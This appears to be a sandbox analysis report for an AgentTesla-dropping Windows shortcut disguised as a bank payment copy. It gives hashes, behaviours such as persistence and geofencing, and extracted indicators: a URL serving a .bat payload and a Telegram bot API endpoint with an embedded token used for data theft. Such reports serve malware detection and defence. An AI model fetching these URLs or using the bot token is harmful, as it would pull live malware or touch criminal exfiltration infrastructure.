Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
Banque BEA_Copie de Paiement_txt.lnk.lnk
-
Size
2KB
-
Sample
240220-hxnp7adg87
-
MD5
32d11ce69ae0bae7375a6a9fcdf65238
-
SHA1
d7ee753812e1b9180d7df3df34df08f13c97ac7a
-
SHA256
8420bf1711e75f17cb07a83a66e038f9635968eeaa17c3540c966347bb1d373c
-
SHA512
3e4c138fdb052ea6a1bd313f0330ce7a0f7b4abff4eccbc612aaccf639ef5fa50491987e8e22817e028c465762547cd253cc1f0d32944f106b0f06ab703cc2a3
Static task
static1
Behavioral task
behavioral1
Sample
Banque BEA_Copie de Paiement_txt.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Banque BEA_Copie de Paiement_txt.lnk
Resource
win10v2004-20231222-en
Malware Config
Extracted
https://remisat.com.uy/bim/office.bat
Extracted
agenttesla
https://api.telegram.org/bot6788300365:AAHk2GTWUvl7PlvMxXk2M1D_7e1yYgg26zE/
Targets
-
-
Target
Banque BEA_Copie de Paiement_txt.lnk.lnk
-
Size
2KB
-
MD5
32d11ce69ae0bae7375a6a9fcdf65238
-
SHA1
d7ee753812e1b9180d7df3df34df08f13c97ac7a
-
SHA256
8420bf1711e75f17cb07a83a66e038f9635968eeaa17c3540c966347bb1d373c
-
SHA512
3e4c138fdb052ea6a1bd313f0330ce7a0f7b4abff4eccbc612aaccf639ef5fa50491987e8e22817e028c465762547cd253cc1f0d32944f106b0f06ab703cc2a3
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect ZGRat V1
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE
-
Adds Run key to start application
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext
-